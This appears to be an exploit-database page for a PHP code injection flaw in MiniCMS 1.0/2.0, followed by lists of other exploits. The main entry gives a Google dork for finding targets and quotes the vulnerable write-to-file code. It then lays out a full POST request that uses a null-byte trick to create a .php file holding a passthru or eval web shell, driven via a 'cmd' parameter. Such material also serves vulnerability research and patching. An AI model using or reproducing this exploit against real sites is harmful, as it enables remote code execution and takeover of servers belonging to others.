Menu

Search for hundreds of thousands of exploits

"MiniCMS 1.0/2.0 - PHP Code Injection"

Author

Exploit author

Or4nG.M4N

Platform

Exploit platform

php

Release date

Exploit published date

2012-01-22

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
########################################################################
# Title    : miniCMS v1.0 : v2.0 php inject code
# Author   : Or4nG.M4n
# Version  : all version 
# GDork    : "This site is managed using MiniCMS©"
# Download : http://sourceforge.net/projects/mini-cms/files/mini-cms/
# Thnks :
# +----------------------------------+
# |   xSs m4n   i-Hmx   h311 c0d3    | sp. Cyb3r-Crystal
# |   SarBoT511 ahwak2000 sa^Dev!L   | sp. ahwak2000
# +----------------------------------+
#                       php code injection and bypass addslashes();
# vuln : update.php shell path /content
# vuln : updatenews.php shell path /content/news

$filename = "content/".$pagename.".txt"; <= .php%00
	
		if ($file = fopen($filename, "w"))
		{
			//chmod($filename, 0777);
			if($pagename == "sitemap"){
				$eachline = split("\n", $postTemp["content"]);
				$cleancontent = "";
				foreach($eachline as $el){
					if(trim($el) != ""){
						$cleancontent .= trim($el) . "\n";
					}
				}
				$postTemp["content"] = $cleancontent;
			}
			//$postTemp["content"] = str_replace('"', '\"', $postTemp["content"]);
			if (!get_magic_quotes_gpc()) {
			   $postTemp["content"] = addslashes($postTemp["content"]);
			} 
			fwrite($file, serialize($postTemp));
			fclose($file);
		}
		else
		{
			echo "Unable to open file for writing, please check permissions on content directory";
		}
	}
	else
	{
		$filename = "content/".$area.".txt"; < = .php%00
		if ($file = fopen($filename, "w"))
		{
			chmod($filename, 0777);
			//$postTemp["content"] = str_replace('"', '\"', $postTemp["content"]);
			fwrite($file, $postTemp["content"]);
			fclose($file);
		}
 How i can Use this Exploit
 in your Browser FireFox 
 use add on LIVE HTTP HEADER
 
 in target page [ http://localhost/miniCMS-2.0/index.php?page=1 ] ..
 Replay to : 
 POST : http://www.cmtsystem.com/mCMS/update.php
 Host: localhost
 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.5
 Accept-Encoding: gzip, deflate
 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
 Connection: keep-alive
 Referer: http://localhost/miniCMS-2.0/index.php?page=1
 Cookie: miniCMSdemo=32b5075aba3eb6c5d11129ec114346c2
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 47
 Post this shit : title=1&metadata=1&content=[CODE]&page=thnks-ahwak2000-cyber-crystal.php%00&area=content
 Add Your code php here : [CODE]
 Now how i can bypass addslashes(); inject <?php passthru($_GET[cmd]);?> or <?php eval($_GET[cmd]);?> 
 Don't Forget Referer : http://site/index.php?page=1
 [ ! ] http://site/content/thnks-ahwak2000-cyber-crystal.php?cmd=uname-a
 # Thnks to all Stupid Coder
 # The End
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-01-16 "Online Book Store 1.0 - Arbitrary File Upload" webapps php Or4nG.M4N
2012-01-30 "4Images 1.7.6-9 - Cross-Site Request Forgery / PHP Code Injection" webapps php Or4nG.M4N
2012-01-22 "MiniCMS 1.0/2.0 - PHP Code Injection" webapps php Or4nG.M4N
2012-01-21 "iSupport 1.x - Cross-Site Request Forgery / HTML Code Injection (Add Admin)" webapps php Or4nG.M4N
2012-01-21 "PHP iReport 1.0 - Remote Html Code Injection" webapps php Or4nG.M4N
2012-01-16 "PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities" webapps php Or4nG.M4N
2012-01-10 "Pragyan CMS 3.0 - Remote File Disclosure" webapps php Or4nG.M4N
2011-11-03 "Jara 1.6 - Multiple Vulnerabilities" webapps php Or4nG.M4N
2011-07-09 "Portix-CMS 1.5.0. rc5 - Local File Inclusion" webapps php Or4nG.M4N
2011-01-15 "ViArt Shop 4.0.5 - Cross-Site Request Forgery" webapps php Or4nG.M4N
2010-11-19 "PHPGallery 1.1.0 - Cross-Site Request Forgery" webapps php Or4nG.M4N
2010-11-19 "Plogger Gallery 1.0 - Cross-Site Request Forgery (Change Admin Password)" webapps php Or4nG.M4N
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.